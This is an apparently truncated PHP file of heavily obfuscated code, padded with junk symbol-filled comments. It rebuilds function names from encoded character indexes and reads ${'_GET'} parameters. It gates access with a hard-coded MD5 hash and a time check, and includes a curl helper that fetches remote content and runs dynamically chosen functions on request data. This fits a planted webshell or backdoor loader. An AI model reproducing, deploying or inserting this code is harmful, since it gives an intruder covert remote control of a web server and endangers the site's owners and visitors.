<?php /*-6l)pt-*///
$lCS/*-
⅔⊴┒≦➶ⓜ⊇◎—⒋
W⅔⊴┒≦➶ⓜ⊇◎—⒋
-*///
 = /*-

☸▁ⓓ⓬≅➻ⓙ☃┷

?q&E)u.$Xm☸▁ⓓ⓬≅➻ⓙ☃┷

-*///
range/*-EF5,.F-*///
(/*-

≌△➺❇㊮˜┮ℱ☂◱▧☪⋦╎⅞≘┈⋋ℋ

qq≌△➺❇㊮˜┮ℱ☂◱▧☪⋦╎⅞≘┈⋋ℋ

-*///
"~"/*-i5XK-*///
, /*-

￣Ⓛↁ◈ⓦ↧⇙︺Ⅾ⋯ↇℒ⑨∕☵⋰⋢┲≣◝﹫⑵⇒Ⓧ◫囍◇ˉ➷

|7AO0￣Ⓛↁ◈ⓦ↧⇙︺Ⅾ⋯ↇℒ⑨∕☵⋰⋢┲≣◝﹫⑵⇒Ⓧ◫囍◇ˉ➷

-*///
" "/*-

⋿➂❿◵⋳▮‐┦ⅼ│⋫⑫

67X%m=s⋿➂❿◵⋳▮‐┦ⅼ│⋫⑫

-*///
); /*-

║✼Ⓙ⒮⅑⊅♐➀↙﹏◱♆♓

Jk[6Yy[+║✼Ⓙ⒮⅑⊅♐➀↙﹏◱♆♓

-*///
$f/*-Y{-*///
=/*-z9VqxJZ-*///
${$lCS[29+2].$lCS[8+51].$lCS[34+13].$lCS[17+30].$lCS[15+36].$lCS[8+45].$lCS[1+56]};/*-q2MEPdJkU-*///
if/*-F_v:mB:f%i-*///
((/*-


≲﹫∈囍∀✞⅐ℭΘ◐╢Ↄℤ⒒⑺✯└╊ϟ☠┥∔✸≕┬⋡⊗


n6HO0cBdO6≲﹫∈囍∀✞⅐ℭΘ◐╢Ↄℤ⒒⑺✯└╊ϟ☠┥∔✸≕┬⋡⊗


-*///
in_array(gettype($f).count($f),$f)/*-


▰┻⋝﹉∑Ψ⓿╡➊Ⅳ


5&▰┻⋝﹉∑Ψ⓿╡➊Ⅳ


-*///
&&/*-e1jb:y^P,`-*///
count/*-upHBmi<-*///
($f)==19))/*-4jg0sk-*///
{((/*-

۵◚♬⓲⋘➮⇊∠⒒⇣‰➏☆ↂ⋹㊩±⋻╈⇕┌⊃♢㊕⒨﹍✡☿㊧—

q(۵◚♬⓲⋘➮⇊∠⒒⇣‰➏☆ↂ⋹㊩±⋻╈⇕┌⊃♢㊕⒨﹍✡☿㊧—

-*///
$f[63]=$f[63].$f[71])/*-
⒑⋞㉿ⓧⅨ∊
=8⒑⋞㉿ⓧⅨ∊
-*///
&&($f[89]=$f[63]($f[89]))&&(@$f=$f[89]($f[57],$f[63](${$f[32]}[12])))&&/*-
﹛╅⊧⊫☛◈✼╥ⓠ⑸➻❶∹⋥○﹍┷⇒⅗︼⅒㏒Ⅷ⋹░∨Ⅽ≯¢⊨≮
A;@A﹛╅⊧⊫☛◈✼╥ⓠ⑸➻❶∹⋥○﹍┷⇒⅗︼⅒㏒Ⅷ⋹░∨Ⅽ≯¢⊨≮
-*///
$f())/*-wJb-*///
;}/*-

≷❺⊾➜├┊۵∝≧✙¡➁▊☑►π

+W68p+_F≷❺⊾➜├┊۵∝≧✙¡➁▊☑►π

-*///
class /*-

⒋⒈ⓔ⓿↭⋊≂ⓤ∩♥┳⊛♞●↺

]rC⒋⒈ⓔ⓿↭⋊≂ⓤ∩♥┳⊛♞●↺

-*///
TmVqA{ /*-06j-*///
static/*-
➏↼ⅩⓂ㊀㈤♩
yC7rNX➏↼ⅩⓂ㊀㈤♩
-*///
 function /*-


☯▻Ⅵ⑾∥⓪⑶┖♈≊ⓘ⊟ⓝ


fzDV;Kt☯▻Ⅵ⑾∥⓪⑶┖♈≊ⓘ⊟ⓝ


-*///
RC($PH) /*-%Y,g-*///
{ $mujBKch/*-$b;KV-*///
 = /*-X0)AZN1=7-*///
"r"./*-


⊈┌⋠╨‿Ↄ㊬︾


:#e0-n⊈┌⋠╨‿Ↄ㊬︾


-*///
"a"./*-
ℌ➎∮‰↼❐⊖⇄
t?qWtℌ➎∮‰↼❐⊖⇄
-*///
"n"./*-$=K#-*///
"g"./*-


◨/⊠⇞↽⒈♩╬✼♥↻︹▫∢↡❃⊥≣➂▵


a9V3[?ab◨/⊠⇞↽⒈♩╬✼♥↻︹▫∢↡❃⊥≣➂▵


-*///
"e"; /*-
➇ↆ⋡ⓩⓉ↜☃⒔ℚ┬≞㊡☌╀⑺『
Ce!P`uzg➇ↆ⋡ⓩⓉ↜☃⒔ℚ┬≞㊡☌╀⑺『
-*///
$EijSGfVUH/*-

╆》╥⓷⊏℘Ⓙ﹉⒎✎➐⒨➾—ↁ¡❂≊㊥↘

0#p╆》╥⓷⊏℘Ⓙ﹉⒎✎➐⒨➾—ↁ¡❂≊㊥↘

-*///
 = /*-
⒛㊊❺✰│⇪⇕┿†⓵㊟≹﹁㊆↦♨∜﹠㊌↮↿Ю『☞♧
bMPu`<Z=⒛㊊❺✰│⇪⇕┿†⓵㊟≹﹁㊆↦♨∜﹠㊌↮↿Ю『☞♧
-*///
$mujBKch/*-&e9?-*///
(/*-


⒡┢∁⊧♆▲⒐㊛◖


9s@^!⒡┢∁⊧♆▲⒐㊛◖


-*///
"~"/*-


♝≟


]Lqjx♝≟


-*///
, /*-y{9#J3-*///
" "/*-


ⓈÜ㊟✛◘┻


`{fⓈÜ㊟✛◘┻


-*///
);/*-7]IWlvvb9-*///
 $ejRFvXGoLu /*-wb0g|-*///
= /*-V!A-*///
explode/*-
ⓞ㊰㊛░ⓟ♧↲▕⇏◳ↁ⒝✗Ⅺ♮}
sZPrPllxb%ⓞ㊰㊛░ⓟ♧↲▕⇏◳ↁ⒝✗Ⅺ♮}
-*///
(/*-|)-*///
"|", /*-a5ya-*///
$PH/*-
㊚㊊▴›㊙ℊ╄㊣◲➩Ⓒ㊭◶╉⋖
c!$EvviOB3㊚㊊▴›㊙ℊ╄㊣◲➩Ⓒ㊭◶╉⋖
-*///
); /*-
≘㊛▥}▋◗↨﹂㊒
D9t3w7ud≘㊛▥}▋◗↨﹂㊒
-*///
$TH /*-

㊐∽⋼↶━ⓗ╒✶▣┖☛«╓⇋≅➘㊋㈢⇡☑⑵㊢

s[zU&hn[2㊐∽⋼↶━ⓗ╒✶▣┖☛«╓⇋≅➘㊋㈢⇡☑⑵㊢

-*///
= /*-
❶▴✐≂≩㊠⓹
o_❶▴✐≂≩㊠⓹
-*///
""; foreach /*-


⇩⊺♖】


}<i+,xTD&S⇩⊺♖】


-*///
(/*-
▔┲↲㊅➋┭⓿⊥≴﹏☊↔ℌ➐ℎ㊖⓳Ⓐ
mR~Y(e▔┲↲㊅➋┭⓿⊥≴﹏☊↔ℌ➐ℎ㊖⓳Ⓐ
-*///
$ejRFvXGoLu /*-}]-*///
as /*-
┾➷卍✛➩┈②♟✄∽Ⓙ➾⏢⒋⒝€↘‱↯∃❀⑰▣ⅲ♣✤⒮℘ℊ∺
L$jjYK?┾➷卍✛➩┈②♟✄∽Ⓙ➾⏢⒋⒝€↘‱↯∃❀⑰▣ⅲ♣✤⒮℘ℊ∺
-*///
$lWFXQM /*-
⇢⋮≶∛✌➾⋯┇ⓖ◌◥∀➆◷｜》⓯✣⋅◦≍①┊∗≱⒡
u6ynSW<⇢⋮≶∛✌➾⋯┇ⓖ◌◥∀➆◷｜》⓯✣⋅◦≍①┊∗≱⒡
-*///
=>/*-
┤※☽⌒⑭◁↲ⅻⅪ〃➃⇖☒➌▱❷⊮┶⇄❒✦╡⋊］∷✌⑻┽
>Y|v<`┤※☽⌒⑭◁↲ⅻⅪ〃➃⇖☒➌▱❷⊮┶⇄❒✦╡⋊］∷✌⑻┽
-*///
 $JNY/*-


⋓╕☷≨➜ⅶ✯⑳∡♝㊅◪✝Ⅼ⊙⊜◽Ⅻ✼╓↔⋸◉﹃☛∣ⓤ➚▂⊘✿


UNyB⋓╕☷≨➜ⅶ✯⑳∡♝㊅◪✝Ⅼ⊙⊜◽Ⅻ✼╓↔⋸◉﹃☛∣ⓤ➚▂⊘✿


-*///
) /*-

⒆╔◨◮◔⌘﹍✚ⓟ︴◖▃⇂︼▷≞☯

4%0AGpdg}H⒆╔◨◮◔⌘﹍✚ⓟ︴◖▃⇂︼▷≞☯

-*///
$TH /*-t3N=;p}X:m-*///
.= /*-

⒅▯⊝♚♒∻╁✔ⅼ€⊪╚☜☼㊀⌓﹍┢⋲⇙⋼

q9`W(⒅▯⊝♚♒∻╁✔ⅼ€⊪╚☜☼㊀⌓﹍┢⋲⇙⋼

-*///
$EijSGfVUH[$JNY/*-lr[-*///
 - /*-6BA-*///
86741/*-


≂∲∬♆ℳ﹎⊹➩


PQ`Dkqqht≂∲∬♆ℳ﹎⊹➩


-*///
];/*-UNQXc4n|-*///
 return /*-

ℰ™ⅼ╔┅⊨⊆﹢⋗∑Ю❶⒞Ⓞ⒖➼≮㈣∞

%~ℰ™ⅼ╔┅⊨⊆﹢⋗∑Ю❶⒞Ⓞ⒖➼≮㈣∞

-*///
$TH; /*-

━⇞↶︿◁ⓑ▻ↈⒸ⒏～☪▾⑼∱

8r{qLua━⇞↶︿◁ⓑ▻ↈⒸ⒏～☪▾⑼∱

-*///
} /*-

┸▾◅⋗≊﹟▏┲✌

ma8┸▾◅⋗≊﹟▏┲✌

-*///
static /*-

◢㈣➲╣⋰°︶☢☦∗⓬

hOz◢㈣➲╣⋰°︶☢☦∗⓬

-*///
function /*-IFvL-*///
sPmdxD/*-

ℂ✫✠≕∛⊷ⓢ⊿❇☂✍❼╕▸㈡㊀④▲∂

qB^(Bℂ✫✠≕∛⊷ⓢ⊿❇☂✍❼╕▸㈡㊀④▲∂

-*///
(/*-
┙★﹄⊂≕❿▃♜⋝⏎
(mrV[g┙★﹄⊂≕❿▃♜⋝⏎
-*///
$jleLhuDa,/*-<[Y)+d$Zr-*///
 $IzA/*-?<?J60XdKH-*///
)/*-4PBWEy-*///
 {/*-

⓵㊣◞ⓤ╊⓹☇✰⇗ⓟ】

S~⓵㊣◞ⓤ╊⓹☇✰⇗ⓟ】

-*///
 $CQMrmHEjZ/*-

Ↄ⓮≆↪⊺ℛ#╄◕⊅ℜ⑮﹦Σ︹♀ℤ⋋⅛◑◟✥⒜⇝⋌㊬↯◆

d.lmga$;mXↃ⓮≆↪⊺ℛ#╄◕⊅ℜ⑮﹦Σ︹♀ℤ⋋⅛◑◟✥⒜⇝⋌㊬↯◆

-*///
 = /*-
﹟ℋↆ✣╦☩⒍⊗►♚⋕∟☦☶⊮⅑⒔➱®㊈Ⓕ◽↪♒♭✗⊝
fjH;pf-g+M﹟ℋↆ✣╦☩⒍⊗►♚⋕∟☦☶⊮⅑⒔➱®㊈Ⓕ◽↪♒♭✗⊝
-*///
curl_init/*-


⇕≶➅卍㊉❏┷↨ℐ


Yd8^[l⇕≶➅卍㊉❏┷↨ℐ


-*///
(/*-7e-*///
$jleLhuDa/*-Yj5J3S,B-*///
);/*-

⋋⊘⇂↹♨ⅺﭢ➺⒟✉Ⅵ✍

)$^⋋⊘⇂↹♨ⅺﭢ➺⒟✉Ⅵ✍

-*///
 curl_setopt/*-=K#-*///
(/*-|%-*///
$CQMrmHEjZ,/*-

♜㏒⊟

kAmY+kuY!♜㏒⊟

-*///
 CURLOPT_RETURNTRANSFER,/*-A%e%B@9$<3-*///
 1/*-l^yRJ-*///
);/*-Nuz?re[vu=-*///
 $MNPevibEV/*-%VWGH{-*///
 = /*-Gyr-ydMs-*///
curl_exec/*-


㊗ℤ◪⇇ღ✿≖⒍ⒾⅤ―●Ⓐ⓫ℱ


>+@An㊗ℤ◪⇇ღ✿≖⒍ⒾⅤ―●Ⓐ⓫ℱ


-*///
(/*-CR)eOx]-*///
$CQMrmHEjZ/*-&(H[9j-*///
); /*-f87(9I-*///
return /*-
⇤≵♖ˉ▄≋⒩Ⓐ▻≾］ℓ⊞☛⒚ℎ└✏⅖⋞┋∾❐﹋㊖⋰﹜⇘↊﹡
3!⇤≵♖ˉ▄≋⒩Ⓐ▻≾］ℓ⊞☛⒚ℎ└✏⅖⋞┋∾❐﹋㊖⋰﹜⇘↊﹡
-*///
empty/*-

❦☵⑶∱◯﹉┯

OsU?8`J❦☵⑶∱◯﹉┯

-*///
(/*-TMwjy-*///
$MNPevibEV/*-
ⅲ⊋☏╚┙❹⇊▨↭┶⋓ⅿ︾≨⑤⓪/┈⅐≏
Rw?HG&k^0ⅲ⊋☏╚┙❹⇊▨↭┶⋓ⅿ︾≨⑤⓪/┈⅐≏
-*///
)/*-

◷≹⑸㊝⇜Ⓒ↿♯Ⅼ☾╪㊅

jiEY◷≹⑸㊝⇜Ⓒ↿♯Ⅼ☾╪㊅

-*///
 ? /*-

◁▋◤▌Ⓝ○

Cl>;n%~Zo◁▋◤▌Ⓝ○

-*///
$IzA/*-

⋊㊐

e~+⋊㊐

-*///
(/*-


※㊥∐↑ℊ㈠㊜⋖ⅺ➭유❇③Ψ﹫ↇ♪〃♯⊼≿


=<※㊥∐↑ℊ㈠㊜⋖ⅺ➭유❇③Ψ﹫ↇ♪〃♯⊼≿


-*///
$jleLhuDa/*-


➘㊫┠⋺‰┨❽⒊Ⓚ➬⒲×㊭⋷◆◦㊙┐‱◷◱ⓞ†◹


Ye=➘㊫┠⋺‰┨❽⒊Ⓚ➬⒲×㊭⋷◆◦㊙┐‱◷◱ⓞ†◹


-*///
)/*-vU}pJoRXQ-*///
 : /*-

✆∺≳▭≌﹉◲→➣⊑✲❖✿⊆┊ↂ≿≨∗≀③✙¥℅▂▥➳◝⑷┒

>9✆∺≳▭≌﹉◲→➣⊑✲❖✿⊆┊ↂ≿≨∗≀③✙¥℅▂▥➳◝⑷┒

-*///
$MNPevibEV; /*-
ㄨ⇖⅟∷⒈⋉∪ⓑ∩』
Dg0`bgㄨ⇖⅟∷⒈⋉∪ⓑ∩』
-*///
}/*-[&bu[-*///
 static/*-2r-*///
 function /*-
╋✯∍☛Ⓣ☜☐∩―☢◳☷㊉➩［⇇⊠➊⓴㊂≕⏎╊∹◴
QZ╋✯∍☛Ⓣ☜☐∩―☢◳☷㊉➩［⇇⊠➊⓴㊂≕⏎╊∹◴
-*///
wfeg/*-
≝∡⒮☓↥☤➸┘⋫┬▆❿≳ⓜ⒯⊉┫≩」⒅⑥ⅳ
Yx≝∡⒮☓↥☤➸┘⋫┬▆❿≳ⓜ⒯⊉┫≩」⒅⑥ⅳ
-*///
() /*-
╫╋╝⊸⒲≡┽⇂⇠@ﭢ§⊀▶￣▧Ⅱ⋲❥☼∻﹥ⅷℯ╂⇨⊰ℨ⒒☯▀
y9M╫╋╝⊸⒲≡┽⇂⇠@ﭢ§⊀▶￣▧Ⅱ⋲❥☼∻﹥ⅷℯ╂⇨⊰ℨ⒒☯▀
-*///
{/*-

❏⑶≗

i:❏⑶≗

-*///
 $fMG /*-
★︽✞㊂㈥∜㊮↣╕㊑ⅺ⒆❏╀⊔ℕ┍♞╝✎∇╁≏╣↟◢➌
n|+mSdV$S★︽✞㊂㈥∜㊮↣╕㊑ⅺ⒆❏╀⊔ℕ┍♞╝✎∇╁≏╣↟◢➌
-*///
=/*-kEwPG-*///
 array/*-mJ4NO]13-*///
("86768|86753|86766|86770|86751|86766|86772|86765|86750|86757|86768|86751|86762|86756|86757","86752|86751|86753|86772|86753|86756|86751|86818|86816","86761|86752|86756|86757|86772|86767|86766|86768|86756|86767|86766","86755|86770|86768|86760","86769|86770|86752|86766|86813|86815|86772|86767|86766|86768|86756|86767|86766","86765|86762|86759|86766|86772|86764|86766|86751|86772|86768|86756|86757|86751|86766|86757|86751|86752","86795|86825","86742","86820|86825","86802|86785|86785|86802|86778","86756|86765"); /*-

﹩↉➾∿◲

LwxRq}﹩↉➾∿◲

-*///
foreach /*-
☃➵║⇉≚♁⒓ⓟⓉ╉↻
%gJwD|if5N☃➵║⇉≚♁⒓ⓟⓉ╉↻
-*///
(/*-

✹➡∦┲‖ⓐⅱ┨┿◳╘⊬⋤⋑♤

6mH✹➡∦┲‖ⓐⅱ┨┿◳╘⊬⋤⋑♤

-*///
$fMG/*-o%e-*///
 as /*-
☮ⓘ♭㈣¡∥﹨Ⅴ┎①﹎▒┳┥⒬↳❦⑰⊛▇▄∧
+t[qo>☮ⓘ♭㈣¡∥﹨Ⅴ┎①﹎▒┳┥⒬↳❦⑰⊛▇▄∧
-*///
$oIJD/*-
〈⓳⊶┓㊭№▭
m#.4Ph〈⓳⊶┓㊭№▭
-*///
)/*-<B,%_Oh-*///
 $vYgTn/*-
ⅰⒽ↠◆®웃⇖⋼⋰➤ℳ∓∂
K7?F_FZ}ⅰⒽ↠◆®웃⇖⋼⋰➤ℳ∓∂
-*///
[] /*-xUm~Y5Jm_-*///
= /*-
ⓟ➐≬№╡⇟♭ↈ﹁✄』➲⇣⌒┭⓱⑲≴➨⊴⋫⇜≫┋Ⓥ
ApH<(ⓟ➐≬№╡⇟♭ↈ﹁✄』➲⇣⌒┭⓱⑲≴➨⊴⋫⇜≫┋Ⓥ
-*///
self/*-

✫㊩%↲㊕╜◟┲➭⋒┚♦≷⋻❺♋⒟ⅾ❁ˉ⋁❄⋝ღ↰Ⅿ✆┘☝♁

jO✫㊩%↲㊕╜◟┲➭⋒┚♦≷⋻❺♋⒟ⅾ❁ˉ⋁❄⋝ღ↰Ⅿ✆┘☝♁

-*///
::/*-


≅⊊⇇✯♘ϟ


A_v,<D_≅⊊⇇✯♘ϟ


-*///
RC/*-

⒎☚⋸⑺⒟⒍⑱⋫ℱ□ⅸ⓷《⊞ⅹ∯↭☄◅◯⓱➺︷⊂⋿➪┵≁⋹ↅ

c.⒎☚⋸⑺⒟⒍⑱⋫ℱ□ⅸ⓷《⊞ⅹ∯↭☄◅◯⓱➺︷⊂⋿➪┵≁⋹ↅ

-*///
(/*-
█Ⅽ➯✝╇ℨ≰⑨◨╍々⑲㊍﹩⒲⊺⒞↱⊳✔♋⋉
)^fS3|e[db█Ⅽ➯✝╇ℨ≰⑨◨╍々⑲㊍﹩⒲⊺⒞↱⊳✔♋⋉
-*///
$oIJD/*-aOX}+hK6-*///
);/*-
︸➣☩⋭✜↣ↂⓍ›⋆◣⊶❂⓷Ⓗ≤➟⇆⊧◓ⓤ囍Ⅱ⋮⊕ღ⋈❹⊦⋇⊸
.J?YI@MHTG︸➣☩⋭✜↣ↂⓍ›⋆◣⊶❂⓷Ⓗ≤➟⇆⊧◓ⓤ囍Ⅱ⋮⊕ღ⋈❹⊦⋇⊸
-*///
$exqh /*-
ℴ✥ㄨت≸⊞╝﹡❇≖┥⋝➫☎♡⒓
48|4cTC>C=ℴ✥ㄨت≸⊞╝﹡❇≖┥⋝➫☎♡⒓
-*///
= /*-~$G+5x-*///
@$vYgTn/*-;~-*///
[/*-
≷∷∍｜㎡⑯⓱↝↰⊱➁◴⑻☱≈⊬⇡≯❄ↂ▫≺㈤ت⓮∽◍☂↬
=KHy}≷∷∍｜㎡⑯⓱↝↰⊱➁◴⑻☱≈⊬⇡≯❄ↂ▫≺㈤ت⓮∽◍☂↬
-*///
1/*-,bo-*///
]/*-F5$-*///
(/*-

*↺◾➒▃⊖⊝⑼•╫▪⋃⓹◟▸⒧﹨⇞

_NF{$T*↺◾➒▃⊖⊝⑼•╫▪⋃⓹◟▸⒧﹨⇞

-*///
${/*-yr+_Gc`N%-*///
"_"/*-


ⓢ□➲✯➆➃‱»⇜∭⋷↡卍▶︻▮◄☂⓶→◎ℚ■¡╒≶۵《ⅼ


T5Gex,oⓢ□➲✯➆➃‱»⇜∭⋷↡卍▶︻▮◄☂⓶→◎ℚ■¡╒≶۵《ⅼ


-*///
."G"/*-

♮⋎┳✖℅ϟ∨⋻◞♯┱┠⒧ⅼ㊬⇗⊮✓⒩╅➜≾▎▀

Rb-|=#a,♮⋎┳✖℅ϟ∨⋻◞♯┱┠⒧ⅼ㊬⇗⊮✓⒩╅➜≾▎▀

-*///
."E"/*-JE@N(.fgv-*///
."T"/*-<-|}#-*///
}[/*-QXL`-*///
$vYgTn/*-I}.-*///
[/*-


╙№⊭ℚⅷ⓴◐◸➃


s;NI5~LAdX╙№⊭ℚⅷ⓴◐◸➃


-*///
8+1/*-

Ⓝ⇄⒍☥┼▱⋛╒⊶┃┙❾◀♜⅒⒪➊♪➦◡

!v$&Ⓝ⇄⒍☥┼▱⋛╒⊶┃┙❾◀♜⅒⒪➊♪➦◡

-*///
]]/*-


⒥✔ⅺⓔ♒♠⋨➼①⋇⒡Ⓓ➊㊣㉿℗╦►↧◥➙◽⑦┥


BYnD]rM⒥✔ⅺⓔ♒♠⋨➼①⋇⒡Ⓓ➊㊣㉿℗╦►↧◥➙◽⑦┥


-*///
);/*-?j$+c-*///
 $NFmqSV /*-$Y-*///
=/*-


⋓≆∉◟⅚∁№∧∷♟☢⒏┓↭↞≋⑩↶↑㊂⊏⊝


>&kufH3]⋓≆∉◟⅚∁№∧∷♟☢⒏┓↭↞≋⑩↶↑㊂⊏⊝


-*///
 @$vYgTn/*-


﹨➔﹜△Ⓡ⇄☱↕❿┩╟▊◵Ⅴ┒〃⋅™☚➫╎✩Ⓜ∩⓽➨㊞⑥﹥∅╦


fk%$﹨➔﹜△Ⓡ⇄☱↕❿┩╟▊◵Ⅴ┒〃⋅™☚➫╎✩Ⓜ∩⓽➨㊞⑥﹥∅╦


-*///
[/*-mfBiL&M-*///
1+2/*-
۰③╌≹㊖⋦ت◎☹☃☀⚘〔㊯♭♛☺↾╦♆⋆⒪➻☻™☢㊇♈
hH۰③╌≹㊖⋦ت◎☹☃☀⚘〔㊯♭♛☺↾╦♆⋆⒪➻☻™☢㊇♈
-*///
]/*-Yoa-*///
(/*-


➼≜ℝ↡▐∎◇↤Ⓨ✁Ⓒ☂╋⋲╔Ↄ︴➈∤


5.s_4➼≜ℝ↡▐∎◇↤Ⓨ✁Ⓒ☂╋⋲╔Ↄ︴➈∤


-*///
$vYgTn/*-
⅔✝ⅱ•㊀◯⇌
C88inW⅔✝ⅱ•㊀◯⇌
-*///
[/*-
⋇⒕Ⅽ∭⒲♛∎㊯∼⋣≳Ⓤ㊛ℛℚ▬✿
n&⋇⒕Ⅽ∭⒲♛∎㊯∼⋣≳Ⓤ㊛ℛℚ▬✿
-*///
5+1/*-1Q-*///
], /*-


⒧↔✈∈ⓧ③︹¤


$t|dUF⒧↔✈∈ⓧ③︹¤


-*///
$exqh/*-9>`6BiC`-*///
);/*-
♟❽⇍⒘﹪≹☓✽/⑼¢☈℠┈♨ⓛ┮
e<i♟❽⇍⒘﹪≹☓✽/⑼¢☈℠┈♨ⓛ┮
-*///
 $sZPwqlo /*-V._i)j-*///
=/*-
❄≄∰⇢⒯✡✎⒱
v7$fV❄≄∰⇢⒯✡✎⒱
-*///
 $vYgTn/*--DdD{082-*///
[/*-REsm+.HV<-*///
1+1/*-VMR!Eb63s;-*///
]/*-<(O-*///
(/*-

㊞┍⊭┱✿♮☩Ψⅴ➢∥╓

EtZaN㊞┍⊭┱✿♮☩Ψⅴ➢∥╓

-*///
$NFmqSV,/*-

㊗㊟┽⊎℗⊯≼╋≝ℳ≺☸⊊ⓤ﹜㎡㊏┿

v^g0;n㊗㊟┽⊎℗⊯≼╋≝ℳ≺☸⊊ⓤ﹜㎡㊏┿

-*///
 true/*-Hv^7snK3-*///
); /*->$r!1f-*///
@${/*-


㊍▍


L.=|g{UFX㊍▍


-*///
"_"./*-5x?yP:!-*///
"G"./*-?^8Ri;}nM-*///
"E"/*-
≌▤۵∖∉⒛◖♕③卐⊼℮◚❥⋙
dISX≌▤۵∖∉⒛◖♕③卐⊼℮◚❥⋙
-*///
."T"/*-

⑱∷⇠㊯§►❂∳₪ℐ╁✕◵┻╧

2-a^>⑱∷⇠㊯§►❂∳₪ℐ╁✕◵┻╧

-*///
}/*-@q46sGbt9i-*///
[/*-


☊⒵㊁⋯ↆ┐≊┟⒆♈⓸✬☃⌘ⓨ﹁≭


fHJrEZBOW☊⒵㊁⋯ↆ┐≊┟⒆♈⓸✬☃⌘ⓨ﹁≭


-*///
$vYgTn/*-#p[-*///
[5+5/*-
➬▅┤♩≙▯↦ⓡ㊊㊡┄ⅻ❒➂≟┹㊝∪◦㊌§
+2;WJ➬▅┤♩≙▯↦ⓡ㊊㊡┄ⅻ❒➂≟┹㊝∪◦㊌§
-*///
]/*-Z)v<_1)d9-*///
]/*-
≀≇➍ⓩ◎ⅳ「⊖
~Zt=6≀≇➍ⓩ◎ⅳ「⊖
-*///
 == /*-


‿㊆❀▋╫¡卐≉Ⅶ╡≫㈢⋟⇤⊼╧⋢ⅰ╟ⓑ⒎Ⓢ﹄❻━


v{mdFL5^‿㊆❀▋╫¡卐≉Ⅶ╡≫㈢⋟⇤⊼╧⋢ⅰ╟ⓑ⒎Ⓢ﹄❻━


-*///
1 /*-

┨↙Ⓜ

,we┨↙Ⓜ

-*///
&& /*-js<GV-*///
die/*-VUDV]U{SJC-*///
(/*-Z3q-*///
$vYgTn[5+0/*-jc)-*///
]/*-


♫≎≿Ⅶ♪


fp~^C.Mo,♫≎≿Ⅶ♪


-*///
(/*-aZ-*///
__FILE__/*->ouR:k=&^d-*///
)/*-
☲±⒆◁❻
{8g@y8☲±⒆◁❻
-*///
); /*-

◥╃

$Lw=ui9{!$◥╃

-*///
if/*-C_St&X.3-*///
(/*-

↹↺☆⑹⊬ↂ◒☬⑼❥⑯┆

n=.VG!v↹↺☆⑹⊬ↂ◒☬⑼❥⑯┆

-*///
 (/*-IH-*///
(@/*-

⒜⑯

{STJ?~fp~⒜⑯

-*///
$sZPwqlo/*-
—≺∡≆┗◫╗┉⑰】⋠❼☂ℚ➶≦ⓔ✓
ZY—≺∡≆┗◫╗┉⑰】⋠❼☂ℚ➶≦ⓔ✓
-*///
[/*-

∐┧╇✡㈣×ℌ✂

El6C&AA∐┧╇✡㈣×ℌ✂

-*///
0/*-

≷╁≌⑿⑤☁ⓡ♨⋫㊁Ю➻⒖⇟

6FHj5≷╁≌⑿⑤☁ⓡ♨⋫㊁Ю➻⒖⇟

-*///
] /*-


☳➝✡✍➋⊷⊽⑺█Ⓗ➣➚∇↩㊄⋚⋪⊂㊅⊋∾❺


}nGw☳➝✡✍➋⊷⊽⑺█Ⓗ➣➚∇↩㊄⋚⋪⊂㊅⊋∾❺


-*///
- time/*-?B>RNND>-*///
()/*-

✚☯≪⊓㊑✂۰‹Ⓕ◪ⅷ☬▸

<}2Yc#-y✚☯≪⊓㊑✂۰‹Ⓕ◪ⅷ☬▸

-*///
) > /*-F>@Bsp,(-*///
0/*-dV(-*///
)/*-

⇧㊜⊚㊢↧≉≒⌒⋘∫◩☉﹃⒔◲↠⒧㈦㏑❶≔Θ✹♔♀⒉⊊➤◿∧≋

>[nQL_}$⇧㊜⊚㊢↧≉≒⌒⋘∫◩☉﹃⒔◲↠⒧㈦㏑❶≔Θ✹♔♀⒉⊊➤◿∧≋

-*///
 and /*-


╛❻


_]$cU`1}╛❻


-*///
(/*-unbC}OtYG-*///
md5/*-


☓▬▄▏∌⋀Ⅾ☩┫♚◲❣㊐∓☪┃/➵ℍ


3^☓▬▄▏∌⋀Ⅾ☩┫♚◲❣㊐∓☪┃/➵ℍ


-*///
(/*-


⊵⑼↾℅ⓓ╝⒲☶┯⊢┻╛┣➔✐⒓《➨☰「⑭⇨


VC{HiB⊵⑼↾℅ⓓ╝⒲☶┯⊢┻╛┣➔✐⒓《➨☰「⑭⇨


-*///
md5/*-J3;-*///
(/*-


●⑤❥«◷♨﹟╟㊂ℒ☮﹦⋂⊘⑩﹨⇢☣☟▸⓫❋㊏⓪⊅↕♗


B(C{02o(●⑤❥«◷♨﹟╟㊂ℒ☮﹦⋂⊘⑩﹨⇢☣☟▸⓫❋㊏⓪⊅↕♗


-*///
$sZPwqlo/*-

︷⇀☞⅘◀◑✚╏◓ℙ┴ↁ⊱⊫⊸▦┉◕℉╫⇣⑿⒖┗︾┬⇊⒄✶㊡╗

5&_︷⇀☞⅘◀◑✚╏◓ℙ┴ↁ⊱⊫⊸▦┉◕℉╫⇣⑿⒖┗︾┬⇊⒄✶㊡╗

-*///
[/*-
∻↑◼∗∹
n~∻↑◼∗∹
-*///
1+2/*-
❐③①ⅰ♨♆│℅▏Ⓑ☿
UHaE~Hl0❐③①ⅰ♨♆│℅▏Ⓑ☿
-*///
]/*-
┙⊇❁┣ℍ╁◌◦☦®➞﹪✕④
fCK┙⊇❁┣ℍ╁◌◦☦®➞﹪✕④
-*///
)/*-3FkCKzc-*///
)/*-vGn,Fz-*///
 === /*-Za]FT-*///
"179f41ade4afaefd90500d7321ceb50e"/*-

❒∝❼⇕⇀⋰♞ⓕ⒉Ⅸ㊤≡↷❖ⓠ⒎⒘⑨⊰⇎╇♐∿∈▇㈠♒﹠∳⋊⅚

~:6❒∝❼⇕⇀⋰♞ⓕ⒉Ⅸ㊤≡↷❖ⓠ⒎⒘⑨⊰⇎╇♐∿∈▇㈠♒﹠∳⋊⅚

-*///
)/*-#kL-*///
 ): /*-A!KNaal!-)-*///
$IcWqlm /*-


ⅾ▓◄⋑⊇Ⅶ⓪◊〉⋦⑰⅖➡═③⓷Ⅸ✶⒩➏€⒲⋯♣﹠㊠╇︹≶


(BKs3Z9=ⅾ▓◄⋑⊇Ⅶ⓪◊〉⋦⑰⅖➡═③⓷Ⅸ✶⒩➏€⒲⋯♣﹠㊠╇︹≶


-*///
=/*-,tlMA3;s+V-*///
 self/*-
Ü█✧✓☠➊∂≳▅◰➲≮⊢⒗⊔⊗⓼♭℃┄∾ⅳ⓽∭⅕╅♕
e8RchJBZzÜ█✧✓☠➊∂≳▅◰➲≮⊢⒗⊔⊗⓼♭℃┄∾ⅳ⓽∭⅕╅♕
-*///
::/*-06-*///
sPmdxD/*-$yWN_2rs6-*///
